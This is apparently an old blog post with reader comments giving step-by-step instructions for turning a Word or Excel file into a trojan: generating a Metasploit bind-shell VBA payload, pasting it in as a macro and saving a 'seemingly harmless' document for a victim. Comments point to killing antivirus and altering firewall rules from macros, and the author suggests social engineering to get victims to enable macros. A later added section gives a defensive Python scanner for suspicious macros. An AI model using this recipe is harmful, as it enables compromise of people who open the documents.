Writing malicious macros using metasploit

This is actually a nice little feature of Metasploit which many of us are not aware of. Here I will guide you through it.

Metasploit is a nice tool written in Ruby and very useful to penetration testers (and script kiddies). It provides good information on exploit techniques and is also a useful resource for exploit developers and security professionals. The latest release is version 3.1 as of now, and the upcoming version 3.2 will be more hack-pack.

Enough insight into Metasploit, now back to action. We will create a malicious .doc file which will spawn a TCP shell on port 8888 simply on opening the file. However, remember that macros must be enabled on the victim's system.

1. Go to Start–>All Programs–>Metasploit–>CMD SHELL.

2. Type cd %APPDATA%

3. Next type in: ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba

4. Now, to use this malicious vba file, open Microsoft Word/Excel.

5. Go to Tools–>Macros–>Visual Basic Editor. Copy the contents of the vba file and paste them in the VB editor.

6. To enable macros, go to Tools–>Macros–>Security. Select the security level as low.

You get this alert window when macros are disabled.

7. Now save the doc file.

8. On opening the seemingly harmless file, it will automatically spawn a cmd shell on port 8888.

Telnet to that port to get a command shell.


So now we have a malicious doc ready for action. We can use any available payload like connect back to attacker or even vnc inject payload. Hope this is helpful.
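
For anyone triaging documents built this way, here is an added example (not part of the original post, and not Metasploit code) that scans VBA source already extracted from a document for an auto-run entry point combined with file-drop and process-launch calls. The indicator lists, the function names and both sample macros are assumptions constructed for illustration.

```python
import re

# Procedures Office runs on its own once macros are enabled.
AUTO_EXEC = re.compile(
    r"^\s*(?:(?:Private|Public)\s+)?Sub\s+"
    r"(Auto_?Open|Auto_?Close|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE)
# Heuristic indicators (assumed, not exhaustive): what a macro that drops
# and starts a program has to contain somewhere in its source.
INDICATORS = {
    "process launch": re.compile(r"\b(Shell|ShellExecute|CreateProcess)\b", re.I),
    "binary file write": re.compile(
        r"\bOpen\b.+\bFor\s+Binary\b|\bPut\s+#|ADODB\.Stream", re.I),
    "executable path": re.compile(r"\.(exe|scr|dll|bat|cmd)\b", re.I),
}
# Constructed samples: an inert skeleton (no payload bytes) and a benign macro.
SAMPLE_SUSPECT = """Sub AutoOpen()
    Dim f As String
    f = Environ("TEMP") & "\\sample.exe"
    Open f For Binary As #1
    Close #1
    Shell f, vbHide
End Sub"""
SAMPLE_BENIGN = """' Shell "calc.exe" was removed from this macro
Sub FormatReport()
    Selection.Font.Bold = True
End Sub"""

def strip_comments(source):
    """Drop VBA apostrophe comments so commented-out code is ignored."""
    out = []
    for line in source.splitlines():
        in_string = False
        for i, ch in enumerate(line):
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                line = line[:i]  # keep only the code before the comment
                break
        out.append(line)
    return "\n".join(out)

def triage(source):
    """Return a verdict plus the entry points and indicators that drove it."""
    code = strip_comments(source)
    entry_points = sorted({m.group(1) for m in AUTO_EXEC.finditer(code)})
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(code))
    verdict = ("block" if entry_points and "process launch" in hits
               else "review" if entry_points or hits else "clean")
    return {"verdict": verdict, "entry_points": entry_points, "indicators": hits}

if __name__ == "__main__":
    print(triage(SAMPLE_SUSPECT), triage(SAMPLE_BENIGN), sep="\n")
```

A "block" verdict needs both an auto-run procedure and a process launch; either one alone is only flagged for review, since plenty of legitimate macros use one or the other.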

  • ranger

    Thanks w0lf. That was helpful. I was not aware that metasploit had those features. That was a pretty simple trick to create trojan documents :)

  • http://blog.invisibledenizen.org natron

    A few posts on some of the powerful things you can do through VBA in Word and Excel:

    Running commands or programs: http://blog.invisibledenizen.org/2008/11/on-vba-in-excel-and-word-documents.html

    Downloading files and saving them to disk: http://blog.invisibledenizen.org/2008/11/vba-function-to-download-files.html

    Running commands as SYSTEM: http://blog.invisibledenizen.org/2008/11/running-commands-as-system-from-vba-in.html

    Killing off any antivirus that may be running: http://blog.invisibledenizen.org/2008/11/how-to-kill-antivirus-from-word-or.html

    Modifying the Windows Firewall: http://blog.invisibledenizen.org/2008/11/modifying-windows-firewall-rules-from.html

    Once a user clicks to allow macros, you can do absolutely anything the user can…

  • http://maestro-sec.com/ w0lf

    Thanks natron. Nice posts

  • vikjava

    I am using metasploit for windows. When I type
    C:\Program Files\Metasploit\Framework3>%APPDATA%
    ‘C:\Documents’ is not recognized as an internal or external command,
    operable program or batch file.

    Help me! thanks

  • http://maestro-sec.com/ w0lf

    Sorry vikjava, it was a typo. The correct windows command is ‘cd %APPDATA%’. The same has been updated in the post.

  • vikjava

    hi w0lf

    When I type ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba, macro.vba has size 0KB and is empty. I went through metasploit to find the problem but I don’t find it.

  • http://maestro-sec.com w0lf

    Well it should work. I am clueless about it. Check if your Anti-virus is responsible for this. Disable AV and try again.

  • r00ty

    @vikjava

    > when i type ruby msf3/msfpayload windows/shell_bind_tcp LPORT=8888 V > macro.vba. macro.vba have size 0KB and empty. I go to metasploit and find problem but i don’t find it.

    The ‘V’ option is available in Metasploit 3.2

    3.1 generates a 0KB file and no error.

  • abhishek

    Hello,

    I tried this technique and it works fine.. But is there any way by which we can force to enable macros automatically when file is opened??? As macros are disabled by default. One can’t ask the victim to enable macros so that our payload is executed!!!

    By the way thanks for the great post!!!

  • http://maestro-sec.com w0lf

    Well for that you need to integrate some MS word exploit (if any available) along with this attack. What I would recommend in such scenarios is SOCIAL ENGINEERING.
    This is really a great tool if you know how to use it efficiently. :)

  • Anisha

    I used Metasploit 3 with Windows XP. The vba file got generated and I added it as a macro for a Word document.

    But nothing happens on opening the Word document. I disassembled the file hvgvIKYIa.exe. This file has only two functions, VirtualProtect and ExitProcess. Does this mean that there is something wrong with the macro.vba file that I have generated?

  • r00t

    i get this error
    “./lib/rex/text.rb:589:in `initialize’: No such file or directory – ./lib/rex/../
    ../data/templates/template.exe (Errno::ENOENT)
    from ./lib/rex/text.rb:589:in `open’
    from ./lib/rex/text.rb:589:in `to_win32pe’
    from msfpayload:143

  • abhishek

    Hi,

    This method used to work fine… But nowadays when I try to generate macros with metasploit… The file size is 180 kb… Which can’t be inserted in an office file..

    Anyone other facing same problem????

  • virus

    ./lib/rex/text.rb:589:in `initialize’: No such file or directory – ./lib/rex/../
    ../data/templates/template.exe (Errno::ENOENT)
    from ./lib/rex/text.rb:589:in `open’
    from ./lib/rex/text.rb:589:in `to_win32pe’
    from msfpayload:99